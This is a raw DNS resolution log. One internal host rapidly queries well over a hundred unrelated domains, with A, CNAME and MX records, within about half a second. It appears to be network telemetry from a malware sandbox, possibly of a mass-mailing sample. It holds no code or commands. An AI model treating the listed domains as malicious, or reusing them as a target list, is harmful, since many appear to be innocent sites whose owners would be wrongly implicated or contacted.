Dec 22, 2023 21:14:50.040733099 CET	1.1.1.1	192.168.2.4	0x96d7	No error (0)	thenile.com.au		104.24.83.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.041088104 CET	1.1.1.1	192.168.2.4	0x2868	Name error (3)	ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.043997049 CET	1.1.1.1	192.168.2.4	0x379e	No error (0)	aikya.org		104.21.69.169	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.043997049 CET	1.1.1.1	192.168.2.4	0x379e	No error (0)	aikya.org		172.67.210.143	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.045056105 CET	1.1.1.1	192.168.2.4	0xcc36	Name error (3)	earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.045469046 CET	1.1.1.1	192.168.2.4	0xa953	Name error (3)	gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.047137022 CET	1.1.1.1	192.168.2.4	0xeb7e	Name error (3)	gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.050178051 CET	1.1.1.1	192.168.2.4	0x285b	No error (0)	maroonshockey.org		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.050178051 CET	1.1.1.1	192.168.2.4	0x285b	No error (0)	maroonshockey.org		3.33.152.147	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.050375938 CET	1.1.1.1	192.168.2.4	0x285b	No error (0)	maroonshockey.org		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.050375938 CET	1.1.1.1	192.168.2.4	0x285b	No error (0)	maroonshockey.org		3.33.152.147	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.060328007 CET	1.1.1.1	192.168.2.4	0x973e	Name error (3)	mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.066699982 CET	1.1.1.1	192.168.2.4	0x5bdf	Name error (3)	acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.073086023 CET	1.1.1.1	192.168.2.4	0x81e5	No error (0)	customizedperformance.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.073086023 CET	1.1.1.1	192.168.2.4	0x81e5	No error (0)	customizedperformance.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.078525066 CET	1.1.1.1	192.168.2.4	0x991b	No error (0)	esisalama.org		213.186.33.19	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.078567028 CET	1.1.1.1	192.168.2.4	0x991b	No error (0)	esisalama.org		213.186.33.19	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.080944061 CET	1.1.1.1	192.168.2.4	0x9e5f	No error (0)	51goabroad.com		38.177.197.58	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.097204924 CET	1.1.1.1	192.168.2.4	0xd531	No error (0)	tgeddesgrant.com		192.124.249.58	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.112692118 CET	1.1.1.1	192.168.2.4	0xa833	No error (0)	sunbeltfinancial.com		206.188.192.247	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118228912 CET	1.1.1.1	192.168.2.4	0xb922	No error (0)	keywordranker.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118228912 CET	1.1.1.1	192.168.2.4	0xb922	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118228912 CET	1.1.1.1	192.168.2.4	0xb922	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118228912 CET	1.1.1.1	192.168.2.4	0xb922	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118669987 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.163	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118669987 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.166	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118669987 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.157	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118669987 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.154	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118669987 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.151	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.118669987 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119193077 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.163	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119193077 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.166	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119193077 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.157	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119193077 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.154	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119193077 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.151	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119193077 CET	1.1.1.1	192.168.2.4	0x7c30	No error (0)	enricobassi.com		62.149.128.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119208097 CET	1.1.1.1	192.168.2.4	0x477	No error (0)	caribbean360.com		67.222.150.127	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119410038 CET	1.1.1.1	192.168.2.4	0x39e7	No error (0)	valentinegrowers.com		185.230.63.171	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119410038 CET	1.1.1.1	192.168.2.4	0x39e7	No error (0)	valentinegrowers.com		185.230.63.107	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.119410038 CET	1.1.1.1	192.168.2.4	0x39e7	No error (0)	valentinegrowers.com		185.230.63.186	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.139970064 CET	1.1.1.1	192.168.2.4	0xa00e	No error (0)	yuejichem.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.139970064 CET	1.1.1.1	192.168.2.4	0xa00e	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.139970064 CET	1.1.1.1	192.168.2.4	0xa00e	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.139970064 CET	1.1.1.1	192.168.2.4	0xa00e	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.145353079 CET	1.1.1.1	192.168.2.4	0xddb9	No error (0)	yandfcorp.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.145353079 CET	1.1.1.1	192.168.2.4	0xddb9	No error (0)	yandfcorp.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.175076962 CET	1.1.1.1	192.168.2.4	0x6132	No error (0)	fuckyoufriday.com.au		116.90.51.60	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.178875923 CET	1.1.1.1	192.168.2.4	0x2033	No error (0)	indfos.com		3.126.94.219	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.178891897 CET	1.1.1.1	192.168.2.4	0x2033	No error (0)	indfos.com		3.126.94.219	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.186480045 CET	1.1.1.1	192.168.2.4	0x9995	No error (0)	racesystems.com.au		218.214.227.80	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.186490059 CET	1.1.1.1	192.168.2.4	0x9995	No error (0)	racesystems.com.au		218.214.227.80	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.190428019 CET	1.1.1.1	192.168.2.4	0x4f6d	No error (0)	harrell-associates.com		205.178.132.70	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.345127106 CET	1.1.1.1	192.168.2.4	0x973e	Name error (3)	mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.345436096 CET	1.1.1.1	192.168.2.4	0x8287	No error (0)	liberty25.org		104.17.71.73	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346134901 CET	1.1.1.1	192.168.2.4	0x2e47	Name error (3)	hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346379995 CET	1.1.1.1	192.168.2.4	0xae15	No error (0)	bethanyhomesnc.com		167.172.236.129	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346390963 CET	1.1.1.1	192.168.2.4	0xaea0	Name error (3)	taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346421003 CET	1.1.1.1	192.168.2.4	0x1f2e	No error (0)	davescheirer.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346421003 CET	1.1.1.1	192.168.2.4	0x1f2e	No error (0)	davescheirer.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346477985 CET	1.1.1.1	192.168.2.4	0x9e5f	No error (0)	51goabroad.com		38.177.197.58	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346534014 CET	1.1.1.1	192.168.2.4	0x67c4	Name error (3)	hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346549034 CET	1.1.1.1	192.168.2.4	0xfa0a	No error (0)	tvs-e.com		13.126.65.12	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346925974 CET	1.1.1.1	192.168.2.4	0x81e5	No error (0)	customizedperformance.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346925974 CET	1.1.1.1	192.168.2.4	0x81e5	No error (0)	customizedperformance.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346971035 CET	1.1.1.1	192.168.2.4	0x814	No error (0)	kegerators.net		3.33.152.147	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346971035 CET	1.1.1.1	192.168.2.4	0x814	No error (0)	kegerators.net		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346987009 CET	1.1.1.1	192.168.2.4	0xb922	No error (0)	keywordranker.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346987009 CET	1.1.1.1	192.168.2.4	0xb922	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346987009 CET	1.1.1.1	192.168.2.4	0xb922	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.346987009 CET	1.1.1.1	192.168.2.4	0xb922	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.347119093 CET	1.1.1.1	192.168.2.4	0xd531	No error (0)	tgeddesgrant.com		192.124.249.58	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.347215891 CET	1.1.1.1	192.168.2.4	0x4f6d	No error (0)	harrell-associates.com		205.178.132.70	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.347292900 CET	1.1.1.1	192.168.2.4	0x5bdf	Name error (3)	acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.347616911 CET	1.1.1.1	192.168.2.4	0x6132	No error (0)	fuckyoufriday.com.au		116.90.51.60	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.347965956 CET	1.1.1.1	192.168.2.4	0x379e	No error (0)	aikya.org		172.67.210.143	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.347965956 CET	1.1.1.1	192.168.2.4	0x379e	No error (0)	aikya.org		104.21.69.169	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.347981930 CET	1.1.1.1	192.168.2.4	0xddb9	No error (0)	yandfcorp.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.347981930 CET	1.1.1.1	192.168.2.4	0xddb9	No error (0)	yandfcorp.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.348280907 CET	1.1.1.1	192.168.2.4	0xcc36	Name error (3)	earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.348391056 CET	1.1.1.1	192.168.2.4	0xa833	No error (0)	sunbeltfinancial.com		206.188.192.247	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.348438025 CET	1.1.1.1	192.168.2.4	0x39e7	No error (0)	valentinegrowers.com		185.230.63.171	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.348438025 CET	1.1.1.1	192.168.2.4	0x39e7	No error (0)	valentinegrowers.com		185.230.63.107	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.348438025 CET	1.1.1.1	192.168.2.4	0x39e7	No error (0)	valentinegrowers.com		185.230.63.186	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.349379063 CET	1.1.1.1	192.168.2.4	0xa953	Name error (3)	gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.349397898 CET	1.1.1.1	192.168.2.4	0x477	No error (0)	caribbean360.com		67.222.150.127	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.349409103 CET	1.1.1.1	192.168.2.4	0xeb7e	Name error (3)	gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.349503040 CET	1.1.1.1	192.168.2.4	0xa00e	No error (0)	yuejichem.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.349503040 CET	1.1.1.1	192.168.2.4	0xa00e	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.349503040 CET	1.1.1.1	192.168.2.4	0xa00e	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.349503040 CET	1.1.1.1	192.168.2.4	0xa00e	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.362740993 CET	1.1.1.1	192.168.2.4	0x2334	No error (0)	loghole.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.362740993 CET	1.1.1.1	192.168.2.4	0x2334	No error (0)	loghole.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.362782955 CET	1.1.1.1	192.168.2.4	0xd8f	Name error (3)	chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.362900019 CET	1.1.1.1	192.168.2.4	0xeb99	Name error (3)	mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.363049984 CET	1.1.1.1	192.168.2.4	0xeb99	Name error (3)	mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.364444971 CET	1.1.1.1	192.168.2.4	0x453f	Name error (3)	bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.364999056 CET	1.1.1.1	192.168.2.4	0xc1a2	Name error (3)	djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.366637945 CET	1.1.1.1	192.168.2.4	0x88cc	Name error (3)	studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.366689920 CET	1.1.1.1	192.168.2.4	0xa843	Name error (3)	aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.366703987 CET	1.1.1.1	192.168.2.4	0x81ef	Name error (3)	cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.367144108 CET	1.1.1.1	192.168.2.4	0xbc05	Name error (3)	select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.367480993 CET	1.1.1.1	192.168.2.4	0xd5	Name error (3)	nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.367577076 CET	1.1.1.1	192.168.2.4	0xc777	Name error (3)	rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.368370056 CET	1.1.1.1	192.168.2.4	0x5b2c	No error (0)	customintegrated.com		199.59.243.225	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.369219065 CET	1.1.1.1	192.168.2.4	0xdbdc	Name error (3)	firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.369992971 CET	1.1.1.1	192.168.2.4	0x605b	No error (0)	cannaclear.com		104.21.52.80	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.369992971 CET	1.1.1.1	192.168.2.4	0x605b	No error (0)	cannaclear.com		172.67.196.235	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.370791912 CET	1.1.1.1	192.168.2.4	0x305	No error (0)	oceanictrailers.com.au		185.162.89.66	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.370898008 CET	1.1.1.1	192.168.2.4	0xd110	Name error (3)	bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.378993034 CET	1.1.1.1	192.168.2.4	0xac41	No error (0)	theproducebox.com		104.26.0.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.378993034 CET	1.1.1.1	192.168.2.4	0xac41	No error (0)	theproducebox.com		104.26.1.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.378993034 CET	1.1.1.1	192.168.2.4	0xac41	No error (0)	theproducebox.com		172.67.68.218	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.383080959 CET	1.1.1.1	192.168.2.4	0x4b88	No error (0)	intermountainmls.com		52.165.155.237	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.383423090 CET	1.1.1.1	192.168.2.4	0x123b	No error (0)	geis.com.au		103.42.111.169	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.383527040 CET	1.1.1.1	192.168.2.4	0x123b	No error (0)	geis.com.au		103.42.111.169	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.385876894 CET	1.1.1.1	192.168.2.4	0x38f0	Name error (3)	rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.385955095 CET	1.1.1.1	192.168.2.4	0x38f0	Name error (3)	rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.394464970 CET	1.1.1.1	192.168.2.4	0xcbaf	Name error (3)	vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.395106077 CET	1.1.1.1	192.168.2.4	0xaf0a	Name error (3)	asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.398508072 CET	1.1.1.1	192.168.2.4	0x4c4d	Name error (3)	saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.403749943 CET	1.1.1.1	192.168.2.4	0x7c71	Name error (3)	joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.404678106 CET	1.1.1.1	192.168.2.4	0xb12c	No error (0)	pcfocus.com.hk			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.404678106 CET	1.1.1.1	192.168.2.4	0xb12c	No error (0)	pcfocus.com.hk			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.404692888 CET	1.1.1.1	192.168.2.4	0xb12c	No error (0)	pcfocus.com.hk			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.404692888 CET	1.1.1.1	192.168.2.4	0xb12c	No error (0)	pcfocus.com.hk			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.422755957 CET	1.1.1.1	192.168.2.4	0x201b	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.422755957 CET	1.1.1.1	192.168.2.4	0x201b	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.423733950 CET	1.1.1.1	192.168.2.4	0x1cc2	No error (0)	jaydien.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.423733950 CET	1.1.1.1	192.168.2.4	0x1cc2	No error (0)	jaydien.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.432717085 CET	1.1.1.1	192.168.2.4	0x8b4d	Name error (3)	154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.435597897 CET	1.1.1.1	192.168.2.4	0x207c	No error (0)	smartiebritches.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.435597897 CET	1.1.1.1	192.168.2.4	0x207c	No error (0)	smartiebritches.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.443542004 CET	1.1.1.1	192.168.2.4	0x4f31	No error (0)	conquestaccounting.com.au		35.197.165.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.456464052 CET	1.1.1.1	192.168.2.4	0xf950	No error (0)	mcammond.net		35.168.67.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.456464052 CET	1.1.1.1	192.168.2.4	0xf950	No error (0)	mcammond.net		3.230.199.117	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.456612110 CET	1.1.1.1	192.168.2.4	0xc957	No error (0)	adm-works.com		216.194.166.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.458178997 CET	1.1.1.1	192.168.2.4	0x31c	No error (0)	jaydien.com		141.193.213.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.458178997 CET	1.1.1.1	192.168.2.4	0x31c	No error (0)	jaydien.com		141.193.213.11	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.474608898 CET	1.1.1.1	192.168.2.4	0xc0b4	No error (0)	saltdelcolom.com		50.31.65.5	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.483592987 CET	1.1.1.1	192.168.2.4	0x9a62	No error (0)	jiashi.com	info.fumi.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.483592987 CET	1.1.1.1	192.168.2.4	0x9a62	No error (0)	info.fumi.com		38.181.56.100	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.483625889 CET	1.1.1.1	192.168.2.4	0x9a62	No error (0)	jiashi.com	info.fumi.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.483625889 CET	1.1.1.1	192.168.2.4	0x9a62	No error (0)	info.fumi.com		38.181.56.100	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.493750095 CET	1.1.1.1	192.168.2.4	0xa7ca	No error (0)	mailbox.lpl.org		96.249.39.20	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.514185905 CET	1.1.1.1	192.168.2.4	0x3caf	Name error (3)	excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.514271975 CET	1.1.1.1	192.168.2.4	0x3caf	Name error (3)	excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.515548944 CET	1.1.1.1	192.168.2.4	0x1cff	No error (0)	massnegocios.com		200.58.112.162	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.523020029 CET	1.1.1.1	192.168.2.4	0x26b2	No error (0)	pistik.com		217.146.69.50	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.523044109 CET	1.1.1.1	192.168.2.4	0x26b2	No error (0)	pistik.com		217.146.69.50	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.526885033 CET	1.1.1.1	192.168.2.4	0x792c	No error (0)	eddc.com		208.91.197.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.544603109 CET	1.1.1.1	192.168.2.4	0xf1e	No error (0)	omuramba.com		156.38.230.76	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.544637918 CET	1.1.1.1	192.168.2.4	0xf1e	No error (0)	omuramba.com		156.38.230.76	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.564084053 CET	1.1.1.1	192.168.2.4	0xf4c4	No error (0)	oljud.net		192.252.151.25	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.564141035 CET	1.1.1.1	192.168.2.4	0xf4c4	No error (0)	oljud.net		192.252.151.25	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.574930906 CET	1.1.1.1	192.168.2.4	0x2b07	Name error (3)	srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.584774017 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.584774017 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.584774017 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.11.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.584774017 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.584774017 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.40.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.584774017 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.592183113 CET	1.1.1.1	192.168.2.4	0xba2b	No error (0)	covicol.com		89.46.108.50	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.642680883 CET	1.1.1.1	192.168.2.4	0xba2b	No error (0)	covicol.com		89.46.108.50	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.642721891 CET	1.1.1.1	192.168.2.4	0x4f31	No error (0)	conquestaccounting.com.au		35.197.165.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.642731905 CET	1.1.1.1	192.168.2.4	0x207c	No error (0)	smartiebritches.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.642731905 CET	1.1.1.1	192.168.2.4	0x207c	No error (0)	smartiebritches.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.642819881 CET	1.1.1.1	192.168.2.4	0xf950	No error (0)	mcammond.net		35.168.67.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.642819881 CET	1.1.1.1	192.168.2.4	0xf950	No error (0)	mcammond.net		3.230.199.117	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.642983913 CET	1.1.1.1	192.168.2.4	0x8b4d	Name error (3)	154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.643035889 CET	1.1.1.1	192.168.2.4	0x1cff	No error (0)	massnegocios.com		200.58.112.162	A (IP address)	IN (0x0001)	false
